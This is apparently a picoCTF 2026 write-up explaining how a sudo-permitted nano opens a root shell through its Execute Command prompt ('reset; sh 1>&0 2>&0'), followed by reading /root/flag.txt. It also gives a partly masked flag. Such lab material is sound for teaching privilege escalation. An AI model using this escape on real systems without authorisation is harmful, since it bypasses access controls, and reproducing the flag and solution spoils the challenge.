picoCTF Solutions
picoCTF 2026General SkillsMedium

ABSOLUTE NANO

Published: March 20, 2026

Description

You have complete power with nano. Think you can get the flag?

Setup

Launch the challenge instance and SSH in.

Check what sudo permissions are available.

sudo -l

Solution

  1. Step 1Check sudo permissions
    Run sudo -l to see what commands the user can run with elevated privileges. The output will show that nano can be executed as root.
    sudo -l
  2. Step 2Open nano with sudo
    Run nano with sudo to execute it with root privileges. Nano has a built-in shell escape that preserves the elevated permissions.
    sudo nano
  3. Step 3Spawn a shell from within nano
    Inside nano, press Ctrl+R then Ctrl+X to open the 'Execute Command' prompt. Enter the following to get an interactive root shell.
    reset; sh 1>&0 2>&0
  4. Step 4Read the flag
    With a root shell, read the flag file.
    cat /root/flag.txt
    find / -name flag.txt 2>/dev/null

Flag

picoCTF{4bs0lut3_n4n0_...}

Nano with sudo can spawn a root shell via Ctrl+R Ctrl+X -- a classic GTFOBins escape.